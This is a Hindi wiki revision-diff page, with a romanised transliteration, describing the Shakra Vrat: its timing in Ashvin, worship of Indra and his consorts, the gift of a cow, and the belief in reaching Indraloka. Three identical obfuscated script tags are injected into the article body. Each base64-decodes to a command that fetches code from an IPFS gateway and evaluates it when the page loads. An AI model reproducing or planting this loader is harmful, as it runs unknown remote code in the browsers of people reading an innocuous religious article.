Difference between revisions of "शक्र व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[आश्विन]] [[शुक्ल पक्ष]] की पंचमी से शक्रव्रत करना चाहिए। <ref>हेमाद्रि (व्रत खण्ड 1, 1204)</ref>
+
*[[आश्विन]] [[शुक्ल पक्ष]] की पंचमी से शक्रव्रत करना चाहिए। <ref>हेमाद्रि (व्रत खण्ड 1, 1204</ref>
 
*आश्विन [[पूर्णिमा]] पर उपवास, [[इन्द्र]], उनकी पत्नी [[शची]], [[ऐरावत]], [[वज्र]], [[मातुलिंग]] ([[मातलि]]) की गंध आदि से पूजा करनी चाहिए।
 
*आश्विन [[पूर्णिमा]] पर उपवास, [[इन्द्र]], उनकी पत्नी [[शची]], [[ऐरावत]], [[वज्र]], [[मातुलिंग]] ([[मातलि]]) की गंध आदि से पूजा करनी चाहिए।
 
*शक्रव्रत एक वर्ष तक करना चाहिए।
 
*शक्रव्रत एक वर्ष तक करना चाहिए।
Line 7: Line 7:
 
*शक्रव्रत एक वर्ष तक करना चाहिए।
 
*शक्रव्रत एक वर्ष तक करना चाहिए।
 
*अन्त में [[गोदान]] करना चाहिए।
 
*अन्त में [[गोदान]] करना चाहिए।
*ऐसी मान्यता है कि शक्रव्रत से [[इन्द्रलोक]] की प्राप्ति होती है। <ref>हेमाद्रि (व्रत खण्ड 2, 237, विष्णुधर्मोत्तरपुराण 3|196|1-3 से उद्धरण)</ref>
+
*ऐसी मान्यता है कि शक्रव्रत से [[इन्द्रलोक]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 237, विष्णुधर्मोत्तरपुराण 3|196|1-3 से उद्धरण</ref>
*ऐसी मान्यता है कि शक्रव्रत शक्र लोक की प्राप्ति होती है। हेमाद्रि (व्रत खण्ड 2, 866, [[पद्म पुराण]] से उद्धरण)।
+
*ऐसी मान्यता है कि शक्रव्रत शक्र लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 866, [[पद्म पुराण]] से उद्धरण)।</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ashvin shukl paksh ki panchami se shakravrat karana chahie. [1]
  • ashvin poornima par upavas, indr, unaki patni shachi, airavat, vajr, matuliang (matali) ki gandh adi se pooja karani chahie.
  • shakravrat ek varsh tak karana chahie.
  • ant mean hiran ka dan karana chahie.
  • khule akash mean bhojan karana chahie.
  • shakravrat ek varsh tak karana chahie.
  • ant mean godan karana chahie.
  • aisi manyata hai ki shakravrat se indralok ki prapti hoti hai.[2]
  • aisi manyata hai ki shakravrat shakr lok ki prapti hoti hai.[3]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 1204
  2. hemadri (vrat khand 2, 237, vishnudharmottarapuran 3|196|1-3 se uddharan
  3. hemadri (vrat khand 2, 866, padm puran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>